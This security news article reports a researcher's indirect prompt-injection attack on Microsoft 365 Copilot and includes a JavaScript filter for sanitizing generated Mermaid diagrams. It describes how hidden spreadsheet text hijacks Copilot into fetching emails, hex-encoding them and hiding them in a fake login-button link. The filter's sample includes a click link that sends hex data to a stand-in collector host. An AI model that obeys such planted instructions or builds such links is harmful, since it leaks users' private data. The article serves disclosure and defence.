Microsoft 365 Copilot Prompt Injection Vulnerability Allows Attackers to Exfiltrate Sensitive Data

A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks.

The flaw, detailed in a blog post published today by researcher Adam Logue, exploits the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration without direct user interaction beyond an initial click.

The attack begins when a user asks M365 Copilot to summarize a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behavior.

These indirect prompts override the summarization task, directing Copilot to invoke its search_enterprise_emails tool to retrieve recent corporate emails. The fetched content is then hex-encoded and fragmented into short lines to bypass Mermaid’s character limits.

Microsoft 365 Copilot Data Exfiltration Via Deceptive Diagrams

Copilot then generates a Mermaid diagram that masquerades as a “login button” secured with a lock emoji. Mermaid is a JavaScript-based tool for creating flowcharts and charts from Markdown-like text.

The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding the encoded email data.

When the user clicks it, believing it’s needed to access the document’s “sensitive” content, the link directs to the attacker’s server, such as a Burp Collaborator instance. The hex-encoded payload is transmitted silently with the request and can then be decoded from the server logs.

Mermaid’s flexibility, including CSS support for hyperlinks, made this vector particularly insidious. Unlike direct prompt injection, where attackers converse with the AI, this method hides commands in benign files like emails or PDFs, making it stealthy for phishing campaigns.

Adam Logue noted similarities to a prior Mermaid exploit in Cursor IDE, which enabled zero-click exfiltration via remote images, though M365 Copilot required user interaction.

The payload, developed after extensive testing, was inspired by Microsoft’s TaskTracker research on detecting “task drift” in LLMs. Despite initial challenges reproducing the issue, Microsoft validated the chain and patched it by September 2025, removing interactive hyperlinks from Copilot’s rendered Mermaid diagrams.
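
The mitigation described above (no interactive hyperlinks in rendered Mermaid diagrams) can be approximated by a filter that runs on LLM-generated Mermaid source before it is rendered. This is an added example, not Microsoft's code or the researcher's; the function name, the thresholds, the host `collector.example` and the sample diagram are constructed assumptions, and it assumes links arrive as Mermaid `click` directives or as raw URLs inside labels.

```javascript
// Added example: pre-render filter for LLM-generated Mermaid source.
// Names and thresholds are assumptions for illustration, not values from the page.
const URL_RE = /https?:\/\/[^\s"'<>)]+/g;   // absolute http(s) URLs
const CLICK_RE = /^\s*click\s+\S+/;         // Mermaid interaction directive
const HEX_RUN_RE = /[0-9a-fA-F]{16,}/g;     // too long to be a colour code or a word
const HEX_BUDGET = 32;                      // hex characters tolerated per diagram

function sanitizeMermaid(source, allowedHosts = []) {
  const findings = [];
  const kept = [];
  source.split(/\r?\n/).forEach((line, idx) => {
    const isClick = CLICK_RE.test(line);
    for (const url of line.match(URL_RE) || []) {
      let host = "(unparseable)";
      try { host = new URL(url).hostname; } catch { /* keep placeholder */ }
      findings.push({
        line: idx + 1,
        host,
        external: !allowedHosts.includes(host),
        viaClick: isClick,
        hexInUrl: (url.match(HEX_RUN_RE) || []).join("").length,
      });
    }
    if (isClick) return; // drop the directive so nothing in the diagram is clickable
    kept.push(line.replace(URL_RE, "[link removed]"));
  });
  // Fragmented payloads: add up long hex runs over the whole diagram, not per line.
  const hexTotal = (source.match(HEX_RUN_RE) || []).join("").length;
  const suspicious =
    hexTotal >= HEX_BUDGET || findings.some((f) => f.external && f.hexInUrl > 0);
  return { sanitized: kept.join("\n"), findings, hexTotal, suspicious };
}

// Constructed sample: the hex decodes to the harmless string "constructed sample data".
const SAMPLE = [
  "flowchart TD",
  '  A["Login to view"]',
  "  style A fill:#0078d4,color:#ffffff",
  '  click A href "https://collector.example/l?d=636f6e73747275637465642073616d706c652064617461"',
].join("\n");

// Constructed benign diagram: no links, only a short colour code.
const BENIGN = ["flowchart TD", "  A[Start] --> B[End]", "  style A fill:#0078d4"].join("\n");
```

A `suspicious` result is a signal to log and review the conversation that produced the diagram; the sanitized source is what should reach the renderer either way.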

The discovery timeline shows that there were challenges in coordination. Adam Logue reported the complete situation on August 15, 2025, after discussions with the Microsoft Security Response Center (MSRC) staff at DEFCON.

After several iterations, including video proofs, MSRC confirmed the vulnerability on September 8 and resolved it by September 26. However, M365 Copilot fell outside the bounty scope, so no reward was granted.

This incident underscores risks in AI tool integrations, especially for enterprise environments handling sensitive data. As LLMs like Copilot connect to APIs and internal resources, defenses against indirect injections remain critical.

Microsoft emphasized ongoing mitigations, but experts urge users to verify document sources and monitor AI outputs closely.

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.